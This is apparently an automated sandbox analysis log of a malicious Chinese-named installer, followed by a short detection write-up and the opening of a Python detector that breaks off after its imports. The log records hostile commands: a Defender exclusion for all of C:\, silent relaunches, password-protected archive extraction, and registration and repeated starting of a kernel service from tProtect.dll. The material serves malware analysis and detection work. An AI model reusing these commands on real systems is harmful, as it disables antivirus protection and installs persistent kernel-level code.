Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CCC4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: String function: 6CF16F10 appears 720 times
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: String function: 6CE79240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00461E40 appears 152 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 004FFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 004628E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2106628910.000000007FBAA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName SSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000000.2104010579.0000000000F79000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName SSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.2105940468.000000000363E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName SSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Binary or memory string: OriginalFileName SSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000002.2141358825.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: XE;.BAT;.CMD;.VBp
Source: classification engine | Classification label: mal76.evad.winEXE@141/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00469313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00473D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00469252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Code function: 6_2_6CE45240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File created: C:\Program Files (x86)\Windows NT\is-JD8VI.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | File created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2296522112.0000000003F89000.00000004.00001000.00020000.00000000.sdmp, is-TAP4G.tmp.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
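The process chain recorded above is a compact detection case study: an Inno Setup stub running from an is-XXXXX.tmp directory relaunches the installer with /VERYSILENT, PowerShell adds a Defender exclusion for the whole of C:\, 7zr.exe unpacks password-protected archives carrying a .dat extension, sc create registers a kernel-type service whose binPath is a .dll under Program Files (x86), and sc start for that service is then invoked dozens of times. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it runs simple rules over a constructed process-creation log whose lines are modelled on the command lines above (installer file names shortened to setup.exe / setup.tmp), and separately counts repeated service-start attempts, since a single sc start looks benign but a burst of them is what stands out in this report. The parent|image|command-line log format, the rule names and the burst threshold of 5 are assumptions.

```python
import re
from collections import Counter, namedtuple

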